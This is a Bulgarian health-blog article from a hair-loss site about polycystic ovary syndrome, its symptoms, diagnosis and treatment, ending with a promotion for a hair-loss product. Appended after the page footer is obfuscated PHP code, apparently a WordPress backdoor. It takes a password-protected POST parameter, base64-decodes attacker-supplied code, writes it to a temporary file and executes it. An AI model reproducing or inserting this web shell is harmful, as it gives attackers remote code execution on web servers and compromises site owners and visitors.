Поликистозен овариален синдром и косопад | Косопад

Поликистозен овариален синдром и косопад

косопад и поликистозен синдромМилиони жени в полово зряла възраст по целия свят, страдат от синдрома на поликистозните яйчници (около 10%). Заболяването предизвиква нарушения във функционирането на яйчниците и производството на хормони. Протича с различни симптоми: акне, косопад, окосмяване на горната устна и др.

Поликистозен овариален синдром (ПОС) е едно от най – често срещаните хормонални нарушения сред жените. Причинява дисбаланс и предизвиква производство на повече тестостерон, създава репродуктивни проблеми.

Като медицинско състояние е възможно ПОС да се появи още в детска възраст, поради което подрастващите са най – застрашени от безплодие в бъдещето. Симптомите са придобиване на мъжки полови белези (окосмение по лицето и корема, загрубяване на гласа), кисти на яйчниците, косопад, акне, отклонения в менструалния цикъл, наднормено тегло и завишен апетит.

Наличието на тази болест може да се установи чрез кръвни медицински тестове, в които се търсят повишени нива на мъжкия полов хормон тестостерон и неговата производна дехидроепиандростерон (ДХЕА). Диагнозата се поставя, ако изследванията покажат голяма концентрация на андрогени и в същото време се наблюдават другите симптоми – окосмяване, косопад и проблеми с менструацията.

Решението е лечение с хапчета за контрол на раждаемостта, съдържащи анти-андрогенни съставки, които практически блокират тестостерона. Ако нямате възможност да използвате противозачатъчни медикаменти, е възможно да се употребяват други лекарствени средства за блокиране на мъжките хормони. За отслабване могат да помогнат подходящи диети, а срещу косопад препарати като „Ефект-2”.

13. септември 2013 11:14:55 от Косопад
Категории: Косопад – Статии | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}